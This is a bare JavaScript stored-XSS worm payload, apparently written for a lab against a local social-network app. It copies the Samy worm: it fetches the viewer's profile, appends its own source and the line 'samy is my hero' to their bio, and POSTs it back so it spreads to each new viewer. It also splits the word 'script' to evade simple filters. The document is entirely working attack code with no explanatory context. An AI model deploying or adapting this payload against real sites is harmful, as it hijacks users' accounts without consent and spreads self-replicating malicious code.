<script>

function xss() {

    var viewer_id = document.getElementById("viewer").innerHTML;

    if (!viewer_id) return;

    var url = "http://127.0.0.1:8000/social/profile/" + viewer_id + "/";

    $(document).ready(function () {

        $.get(url, function(data, status) {

            var reg = new RegExp('<p id="bio">(?<bio>.*)<\/p>');
            match = reg.exec(data);
            if (!match) return;

            viewer_bio = match.groups.bio;

            if (viewer_bio.includes("<scr" + "ipt")) return;

            script_text = "<scr" + "ipt>" + xss.toString() + ";xss();" + "</scr" + "ipt>";
            bio = viewer_bio + " but most of all, samy is my hero" + script_text;
            
            var payload = {
                "pk": viewer_id,
                "bio": bio
            };

            $.post(url, payload, function(data, status) {
            console.log("WORKED!");
            });
        });

    });

}

xss();

</script>